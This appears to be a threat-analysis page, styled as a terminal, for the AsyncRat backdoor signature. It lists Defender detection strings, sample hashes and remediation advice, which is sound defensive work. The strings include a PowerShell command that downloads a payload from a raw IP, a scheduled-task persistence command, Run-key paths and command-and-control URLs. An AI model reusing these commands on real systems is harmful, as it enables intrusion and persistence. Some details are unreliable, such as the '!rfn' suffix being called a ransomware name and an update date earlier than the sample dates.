user@threatcheck.sh ~ threat-analysis
bash
$ analyze-threat Backdoor:MSIL/AsyncRat!rfn
Backdoor:MSIL/AsyncRat!rfn - Windows Defender threat signature analysis

Backdoor:MSIL/AsyncRat!rfn - Windows Defender Threat Analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Backdoor:MSIL/AsyncRat!rfn
Classification:
Type:Backdoor
Platform:MSIL
Family:AsyncRat
Detection Type:Concrete
Known malware family with identified signatures
Suffix:!rfn
Specific ransomware family name
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Backdoor - Provides unauthorized remote access for .NET (Microsoft Intermediate Language) platform, family AsyncRat

Summary:

This is a concrete detection of Backdoor:MSIL/AsyncRat!rfn, a sophisticated Remote Access Trojan (RAT) that grants attackers full control over the infected system. It utilizes legitimate Windows processes like MSBuild.exe and COM Surrogate for execution and evasion, establishes persistence via registry keys, and communicates with command-and-control servers for data exfiltration and further malicious activities.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - Set ZpXcmsCQ = CreateObject("Wscript.Shell") (MACROHSTR_EXT)
 - ZpXcmsCQ.Run rdeAjnshv + lqfadUMW + AKrDsxioC, RValue (MACROHSTR_EXT)
 - Set fso = CreateObject("Scripting.FileSystemObject") (PEHSTR_EXT)
 -  & "\ (PEHSTR_EXT)
 - .xml" (PEHSTR_EXT)
 - Set object_Shell = CreateObject("Shell.Application") (PEHSTR_EXT)
 - object_Shell.ShellExecute "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",  (PEHSTR_EXT)
 - COM Surrogate (PEHSTR_EXT)
 - trevnoC.metsyS (PEHSTR_EXT)
 - CompressionMode (PEHSTR_EXT)
 - TripleDESCryptoServiceProvider (PEHSTR_EXT)
 - https://ufile.io/rftaeqtc (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
 - http://serverupdates48.ga/test (PEHSTR_EXT)
 - HttpWebRequest (PEHSTR_EXT)
 - CarRentalSystem\obj\Debug\Dash.pdb (PEHSTR_EXT)
 - crypted.exe (PEHSTR_EXT)
 - sqkpikos.pdb (PEHSTR_EXT)
 - HCS Computers & Laptops (PEHSTR_EXT)
 - Client.Install (PEHSTR_EXT)
 - GetExecutingAssembly (PEHSTR_EXT)
 - System.Windows.Forms (PEHSTR_EXT)
 - System.Reflection (PEHSTR_EXT)
 - B.text (PEHSTR_EXT)
 - setUTCMinutesTU Jurassic.Library.JSFunctionFlags (PEHSTR_EXT)
 - calc_pro.Form1.resources (PEHSTR_EXT)
 - payload.exe (PEHSTR_EXT)
 - get_Computer (PEHSTR_EXT)
 - Dotfuscated\windwos.pdb (PEHSTR_EXT)
 - windwos.My (PEHSTR_EXT)
 - 134.122.133.49 (PEHSTR_EXT)
 - Client.bin (PEHSTR_EXT)
 - Select * From Win32_ComputerSystem (PEHSTR_EXT)
 - Dotfuscated\CryptoObfuscator_Output\v4.pdb (PEHSTR_EXT)
 - v4.Resources.resources (PEHSTR_EXT)
 - windwos.pdb (PEHSTR_EXT)
 - petrolmanagementsystem.Supplier_withdraw_pump_bank_detail.resources (PEHSTR_EXT)
 - \x64\Release\WechatAnd.pdb (PEHSTR_EXT)
 - windwos\bin\Debug\Dotfuscated\windwos.pdb (PEHSTR_EXT)
 - server.Resources.resources (PEHSTR_EXT)
 - RAT\AsyncRat_0313\rat_Client\rat_pro\obj\Debug\rat_pro.pdb (PEHSTR_EXT)
 - 9ubmFjIG1hcmdvcnAgc2loVCHNTAG4Ic (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - \RatClientTest.pdb (PEHSTR)
 - Ymcfcbdts.Properties (PEHSTR_EXT)
 - Stub.g.resources (PEHSTR)
 - RunHiddenCommand (PEHSTR)
 - RawAccel.exe (PEHSTR)
 - seftali\x64\Release\seftali.pdb (PEHSTR_EXT)
 - loader\x64\Release\Espio.pdb (PEHSTR_EXT)
 - powershell(new-object System.Net.WebClient).DownloadFile('http://149.88.66.68/test.mp3','%Temp%/test.bin') (PEHSTR_EXT)
 - schtasks /create /f /sc onlogon /rl highest /tn (PEHSTR_EXT)
 - Stub.exe (PEHSTR_EXT)
 - nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS (PEHSTR_EXT)
 - Skipping Annabelle.exe (PEHSTR_EXT)
 - powershell.exe (PEHSTR_EXT)
 - ExecutionPolicy Bypass -File (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware which is associated with this threat:
Filename: cdff0bb80f281addc41f1e78a7326af25d024480cd47536a095d607859132053
cdff0bb80f281addc41f1e78a7326af25d024480cd47536a095d607859132053
08/05/2026
VirusTotalDownload Sample
Filename: 05b9708096e35ae64b39b02bfbd4d3e760fd294a059f783aa106d4c9cce68300
05b9708096e35ae64b39b02bfbd4d3e760fd294a059f783aa106d4c9cce68300
08/05/2026
VirusTotalDownload Sample
Filename: Quotes & Samples 04-05-26.exe
6c4229ac9e24a9d1444a5bc37f0d3fdb16befe906fd0005138a52ae65ccb0503
05/05/2026
VirusTotalDownload Sample
Filename: xdee1f9121f3a6682101389f432b4dee709507f7ace0a.exe
dee1f9121f3a6682101389f432b4dee709507f7ace0a21d9cdbe373a40998e73
11/04/2026
VirusTotalDownload Sample
Filename: fud.exe
55179fcade854308f587291b9bb586f97758ed216a5d773610e3f5f38d25e5e9
05/04/2026
VirusTotalDownload Sample
Remediation Steps:
Immediately isolate the affected host from the network. Conduct a thorough forensic analysis and full system scan with up-to-date security software. Remove all detected malicious files and registry entries. Verify and remove any established persistence mechanisms (e.g., Run keys). Reset all potentially compromised user credentials and consider a complete system reimage for critical assets due to the extensive capabilities of RATs.
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 17/11/2025. Do you want to analyze it again?
$ ls available-commands/
→ cd /home
user@threatcheck.sh:~$